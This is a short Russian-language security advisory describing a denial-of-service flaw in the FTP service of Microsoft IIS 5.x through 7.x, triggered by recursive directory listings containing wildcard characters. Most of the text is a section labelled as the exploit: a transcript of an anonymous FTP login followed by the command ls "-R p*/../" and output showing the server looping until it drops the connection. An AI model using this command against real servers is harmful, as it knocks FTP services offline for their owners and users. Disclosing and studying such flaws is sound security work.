Программа:
Microsoft Internet Information Services (IIS) 5.x
Microsoft Internet Information Services (IIS) 6
Microsoft Internet Information Services (IIS) 7.x

Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую
систему. Уязвимость существует из-за ошибки в проверке входных данных при
обработке запросов на рекурсивный просмотр директорий. Атакующий может передать
специально сформированные символы, например "*", что приведет к отказу в
обслуживании FTP сервиса.

Эксплоит:

C:\Users\Nikolaos>ftp 192.168.2.102
Verbindung mit 192.168.2.102 wurde hergestellt.
220 Microsoft FTP Service
Benutzer (192.168.2.102:(none)): ftp
331 Anonymous access allowed, send identity (e-mail name) as password.
Kennwort:
230 Anonymous user logged in.
ftp> ls "-R p*/../"
...
p*/../pub:
pub
...
p*/../pub:
pub
...
p*/../pub:
pub
...
p*/../pub:
pub
...
Verbindung beendet durch Remotehost. (MEANS: Remote Host has closed
the connection)
ftp>
ftp>



Оставить мнение